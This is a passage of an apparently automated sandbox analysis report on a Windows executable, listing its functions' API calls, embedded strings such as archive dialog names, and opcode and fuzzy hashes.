                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                  • Instruction ID: f007d95f1721c60f662579466247073374e1a5d02528f9a4b22ebee83c5ee04f
                  • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                  • Instruction Fuzzy Hash: 83112171544B08FADE30BBB0DD8BFCBB79D6F15700F408865B29DA6452DB65F9048B90
                  APIs
                  • GetLastError.KERNEL32(?,?,001920C1,0018FB12), ref: 001920D8
                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001920E6
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001920FF
                  • SetLastError.KERNEL32(00000000,?,001920C1,0018FB12), ref: 00192151
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ErrorLastValue___vcrt_
                  • String ID:
                  • API String ID: 3852720340-0
                  • Opcode ID: a4e915863b275400ceebfc43806b863baed069de561b83268ef8e3f51516f839
                  • Instruction ID: 0f74f893245c3252031b55057dd1544d179edbef96b6eab9c4fe4022e26ccf28
                  • Opcode Fuzzy Hash: a4e915863b275400ceebfc43806b863baed069de561b83268ef8e3f51516f839
                  • Instruction Fuzzy Hash: DF01FC322493117EBF552BB57C8561A6B84FB23B707210B39F224554F0EF214D515244
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                  • API String ID: 0-1718035505
                  • Opcode ID: 0daa597c26624ba65e8507a4d6fe3d5dcd313d0eeb5db6dfc250f1afc714271a
                  • Instruction ID: 4b0c002f22b26923c5e3e8497fd28ac491b444ebb03ddd60ce828a549d4ef43c
                  • Opcode Fuzzy Hash: 0daa597c26624ba65e8507a4d6fe3d5dcd313d0eeb5db6dfc250f1afc714271a
                  • Instruction Fuzzy Hash: 1901F4726527229B4F227EB87D817AA6794AB46352720027EF501D32C0EB91CAC1DFA0
                  APIs
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00180D0D
                    • Part of subcall function 0017ACF5: GetVersionExW.KERNEL32(?), ref: 0017AD1A
                  • LocalFileTimeToFileTime.KERNEL32(?,00180CB8), ref: 00180D31
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00180D47
                  • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00180D56
                  • SystemTimeToFileTime.KERNEL32(?,00180CB8), ref: 00180D64
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00180D72
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Time$File$System$Local$SpecificVersion
                  • String ID:
                  • API String ID: 2092733347-0
                  • Opcode ID: f60cd33516ec209a1cb256c2799421ff948c0ccecca4e8fc98c7a0738b1d02ce
                  • Instruction ID: c8fd2e6c548856a2f21795582dd9d34526a99ecc562ea2e82685afd83320f9a1
                  • Opcode Fuzzy Hash: f60cd33516ec209a1cb256c2799421ff948c0ccecca4e8fc98c7a0738b1d02ce
                  • Instruction Fuzzy Hash: 7E31D87A90020AEBCB00DFE4C9859EFFBBCFF58700B04455AE955E3610E7309685CB64
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: _memcmp
                  • String ID:
                  • API String ID: 2931989736-0
                  • Opcode ID: 5525392069f73927a4d337fafa7b85fe6820b119b54b9a1820ecc5e8c69e6541
                  • Instruction ID: 67254fa7661f70ae3e85d4647814f93a8beb0e718a9f485e5c75fca14ae3a1de
                  • Opcode Fuzzy Hash: 5525392069f73927a4d337fafa7b85fe6820b119b54b9a1820ecc5e8c69e6541
                  • Instruction Fuzzy Hash: 8921A97160410EBBDB05BE14CC81E7B77AEEF91794B188228FC099B202E370DF455B90
                  APIs
                  • GetLastError.KERNEL32(?,001B0EE8,00193E14,001B0EE8,?,?,00193713,00000050,?,001B0EE8,00000200), ref: 00198FA9
                  • _free.LIBCMT ref: 00198FDC
                  • _free.LIBCMT ref: 00199004
                  • SetLastError.KERNEL32(00000000,?,001B0EE8,00000200), ref: 00199011
                  • SetLastError.KERNEL32(00000000,?,001B0EE8,00000200), ref: 0019901D
                  • _abort.LIBCMT ref: 00199023
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ErrorLast$_free$_abort
                  • String ID:
                  • API String ID: 3160817290-0
                  • Opcode ID: dfade85754e7e9d4bd781f23be1eba4c0b3112adcca22d39bcd30c04bbc7f83b
                  • Instruction ID: 739e9712cd043c859841f53764a887127e886320203ae3a8800b58d474c3939f
                  • Opcode Fuzzy Hash: dfade85754e7e9d4bd781f23be1eba4c0b3112adcca22d39bcd30c04bbc7f83b
                  • Instruction Fuzzy Hash: D2F04C355046006BCF2137386C0AF2B296AAFE3770F360018F429D3692EF21DD015050
                  APIs
                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0018D2F2
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0018D30C
                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0018D31D
                  • TranslateMessage.USER32(?), ref: 0018D327
                  • DispatchMessageW.USER32(?), ref: 0018D331
                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0018D33C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                  • String ID:
                  • API String ID: 2148572870-0
                  • Opcode ID: 0c1fd9d791457b4bd0dc094b35e5ecfabda620676b74749b45f2056b3cdc5a73
                  • Instruction ID: d6f56bacc3f775839182c45ca2996d69aba3a115d17d9f902a6ccbb1e4f9ac0e
                  • Opcode Fuzzy Hash: 0c1fd9d791457b4bd0dc094b35e5ecfabda620676b74749b45f2056b3cdc5a73
                  • Instruction Fuzzy Hash: 60F031B1A02219ABCB206BA5EC4DEDBBF6DEF52351F008012F916D2450D6348681CBB1
                  APIs
                  • _wcschr.LIBVCRUNTIME ref: 0018C435
                    • Part of subcall function 001817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0017BB05,00000000,.exe,?,?,00000800,?,?,001885DF,?), ref: 001817C2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: CompareString_wcschr
                  • String ID: <$HIDE$MAX$MIN
                  • API String ID: 2548945186-3358265660
                  • Opcode ID: 6df54f42bd6c9f21503a7a5db059bf8e6cb49cc8976f71fb428460569b7150d8
                  • Instruction ID: 1211f5fb239f3a8e266aba66afc07625c2a231b724f9b346351eb9004818a1b2
                  • Opcode Fuzzy Hash: 6df54f42bd6c9f21503a7a5db059bf8e6cb49cc8976f71fb428460569b7150d8
                  • Instruction Fuzzy Hash: 5D316176904609AEDF25EA94CC91FEA77BDEB64314F004066FA05D6050EBB19FC48FA0
                  APIs
                  • LoadBitmapW.USER32(00000065), ref: 0018ADFD
                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0018AE22
                  • DeleteObject.GDI32(00000000), ref: 0018AE54
                  • DeleteObject.GDI32(00000000), ref: 0018AE77
                    • Part of subcall function 00189E1C: FindResourceW.KERNEL32(0018AE4D,PNG,?,?,?,0018AE4D,00000066), ref: 00189E2E
                    • Part of subcall function 00189E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0018AE4D,00000066), ref: 00189E46
                    • Part of subcall function 00189E1C: LoadResource.KERNEL32(00000000,?,?,?,0018AE4D,00000066), ref: 00189E59
                    • Part of subcall function 00189E1C: LockResource.KERNEL32(00000000,?,?,?,0018AE4D,00000066), ref: 00189E64
                  Strings
                  Similarity
                  • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                  • String ID: ]
                  • API String ID: 142272564-3352871620
                  APIs
                    • Part of subcall function 0017130B: GetDlgItem.USER32(00000000,00003021), ref: 0017134F
                    • Part of subcall function 0017130B: SetWindowTextW.USER32(00000000,001A35B4), ref: 00171365
                  • EndDialog.USER32(?,00000001), ref: 0018CCDB
                  • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0018CCF1
                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0018CD05
                  • SetDlgItemTextW.USER32(?,00000068), ref: 0018CD14
                  Strings
                  Similarity
                  • API ID: ItemText$DialogWindow
                  • String ID: RENAMEDLG
                  • API String ID: 445417207-3299779563
                  APIs
                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00197573,00000000,?,00197513,00000000,001ABAD8,0000000C,0019766A,00000000,00000002), ref: 001975E2
                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001975F5
                  • FreeLibrary.KERNEL32(00000000,?,?,?,00197573,00000000,?,00197513,00000000,001ABAD8,0000000C,0019766A,00000000,00000002), ref: 00197618
                  Strings
                  Similarity
                  • API ID: AddressFreeHandleLibraryModuleProc
                  • String ID: CorExitProcess$mscoree.dll
                  • API String ID: 4061214504-1276376045
                  APIs
                    • Part of subcall function 00180085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001800A0
                    • Part of subcall function 00180085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0017EB86,Crypt32.dll,00000000,0017EC0A,?,?,0017EBEC,?,?,?), ref: 001800C2
                  • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0017EB92
                  • GetProcAddress.KERNEL32(001B81C0,CryptUnprotectMemory), ref: 0017EBA2
                  Strings
                  Similarity
                  • API ID: AddressProc$DirectoryLibraryLoadSystem
                  • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                  • API String ID: 2141747552-1753850145
                  APIs
                  Similarity
                  • API ID: _free
                  • String ID:
                  • API String ID: 269201875-0
                  APIs
                  • GetEnvironmentStringsW.KERNEL32 ref: 0019B619
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0019B63C
                    • Part of subcall function 00198518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0019C13D,00000000,?,001967E2,?,00000008,?,001989AD,?,?,?), ref: 0019854A
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0019B662
                  • _free.LIBCMT ref: 0019B675
                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0019B684
                  Similarity
                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                  • String ID:
                  • API String ID: 336800556-0
                  APIs
                  • GetLastError.KERNEL32(?,?,?,0019895F,001985FB,?,00198FD3,00000001,00000364,?,00193713,00000050,?,001B0EE8,00000200), ref: 0019902E
                  • _free.LIBCMT ref: 00199063
                  • _free.LIBCMT ref: 0019908A
                  • SetLastError.KERNEL32(00000000,?,001B0EE8,00000200), ref: 00199097
                  • SetLastError.KERNEL32(00000000,?,001B0EE8,00000200), ref: 001990A0
                  Similarity
                  • API ID: ErrorLast$_free
                  • String ID:
                  • API String ID: 3170660625-0
                  APIs
                    • Part of subcall function 00180A41: ResetEvent.KERNEL32(?), ref: 00180A53
                    • Part of subcall function 00180A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00180A67
                  • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0018078F
                  • CloseHandle.KERNEL32(?,?), ref: 001807A9
                  • DeleteCriticalSection.KERNEL32(?), ref: 001807C2
                  • CloseHandle.KERNEL32(?), ref: 001807CE
                  • CloseHandle.KERNEL32(?), ref: 001807DA
                    • Part of subcall function 0018084E: WaitForSingleObject.KERNEL32(?,000000FF,00180A78,?), ref: 00180854
                    • Part of subcall function 0018084E: GetLastError.KERNEL32(?), ref: 00180860
                  Similarity
                  • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                  • String ID:
                  • API String ID: 1868215902-0
                  APIs
                  • _free.LIBCMT ref: 0019BF28
                    • Part of subcall function 001984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0019BFA7,?,00000000,?,00000000,?,0019BFCE,?,00000007,?,?,0019C3CB,?), ref: 001984F4
                    • Part of subcall function 001984DE: GetLastError.KERNEL32(?,?,0019BFA7,?,00000000,?,00000000,?,0019BFCE,?,00000007,?,?,0019C3CB,?,?), ref: 00198506
                  • _free.LIBCMT ref: 0019BF3A
                  • _free.LIBCMT ref: 0019BF4C
                  • _free.LIBCMT ref: 0019BF5E
                  • _free.LIBCMT ref: 0019BF70
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  APIs
                  • _free.LIBCMT ref: 0019807E
                    • Part of subcall function 001984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0019BFA7,?,00000000,?,00000000,?,0019BFCE,?,00000007,?,?,0019C3CB,?), ref: 001984F4
                    • Part of subcall function 001984DE: GetLastError.KERNEL32(?,?,0019BFA7,?,00000000,?,00000000,?,0019BFCE,?,00000007,?,?,0019C3CB,?,?), ref: 00198506
                  • _free.LIBCMT ref: 00198090
                  • _free.LIBCMT ref: 001980A3
                  • _free.LIBCMT ref: 001980B4
                  • _free.LIBCMT ref: 001980C5
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\rWjaZEKha8.exe,00000104), ref: 001976FD
                  • _free.LIBCMT ref: 001977C8
                  • _free.LIBCMT ref: 001977D2
                  Strings
                  Similarity
                  • API ID: _free$FileModuleName
                  • String ID: C:\Users\user\Desktop\rWjaZEKha8.exe
                  • API String ID: 2506810119-1105223825
                  APIs
                  • __EH_prolog.LIBCMT ref: 00177579
                    • Part of subcall function 00173B3D: __EH_prolog.LIBCMT ref: 00173B42
                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00177640
                    • Part of subcall function 00177BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00177C04
                    • Part of subcall function 00177BF5: GetLastError.KERNEL32 ref: 00177C4A
                    • Part of subcall function 00177BF5: CloseHandle.KERNEL32(?), ref: 00177C59
                  Strings
                  Similarity
                  • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                  • API String ID: 3813983858-639343689
                  APIs
                    • Part of subcall function 0017130B: GetDlgItem.USER32(00000000,00003021), ref: 0017134F
                    • Part of subcall function 0017130B: SetWindowTextW.USER32(00000000,001A35B4), ref: 00171365
                  • EndDialog.USER32(?,00000001), ref: 0018A4B8
                  • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0018A4CD
                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0018A4E2
                  Strings
                  Similarity
                  • API ID: ItemText$DialogWindow
                  • String ID: ASKNEXTVOL
                  • API String ID: 445417207-3402441367
                  APIs
                  Strings
                  Similarity
                  • API ID: __fprintf_l_strncpy
                  • String ID: $%s$@%s
                  • API String ID: 1857242416-834177443
                  APIs
                    • Part of subcall function 0017130B: GetDlgItem.USER32(00000000,00003021), ref: 0017134F
                    • Part of subcall function 0017130B: SetWindowTextW.USER32(00000000,001A35B4), ref: 00171365
                  • EndDialog.USER32(?,00000001), ref: 0018A9DE
                  • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0018A9F6
                  • SetDlgItemTextW.USER32(?,00000067,?), ref: 0018AA24
                  Strings
                  Similarity
                  • API ID: ItemText$DialogWindow
                  • String ID: GETPASSWORD1
                  • API String ID: 445417207-3292211884
                  APIs
                  • _swprintf.LIBCMT ref: 0017B51E
                    • Part of subcall function 0017400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0017401D
                  • _wcschr.LIBVCRUNTIME ref: 0017B53C
                  • _wcschr.LIBVCRUNTIME ref: 0017B54C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: _wcschr$__vswprintf_c_l_swprintf
                  • String ID: %c:\
                  • API String ID: 525462905-3142399695
                  APIs
                  • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0017ABC5,00000008,?,00000000,?,0017CB88,?,00000000), ref: 001806F3
                  • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0017ABC5,00000008,?,00000000,?,0017CB88,?,00000000), ref: 001806FD
                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0017ABC5,00000008,?,00000000,?,0017CB88,?,00000000), ref: 0018070D
                  Strings
                  • Thread pool initialization failed., xrefs: 00180725
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                  • String ID: Thread pool initialization failed.
                  • API String ID: 3340455307-2182114853
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID: RENAMEDLG$REPLACEFILEDLG
                  • API String ID: 0-56093855
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: __alldvrm$_strrchr
                  • String ID:
                  • API String ID: 1036877536-0
                  APIs
                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,001780B7,?,?,?), ref: 0017A351
                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,001780B7,?,?), ref: 0017A395
                  • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,001780B7,?,?,?,?,?,?,?,?), ref: 0017A416
                  • CloseHandle.KERNEL32(?,?,00000000,?,001780B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0017A41D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: File$Create$CloseHandleTime
                  • String ID:
                  • API String ID: 2287278272-0
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,001989AD,?,00000000,?,00000001,?,?,00000001,001989AD,?), ref: 0019C0E6
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0019C16F
                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001967E2,?), ref: 0019C181
                  • __freea.LIBCMT ref: 0019C18A
                    • Part of subcall function 00198518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0019C13D,00000000,?,001967E2,?,00000008,?,001989AD,?,?,?), ref: 0019854A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
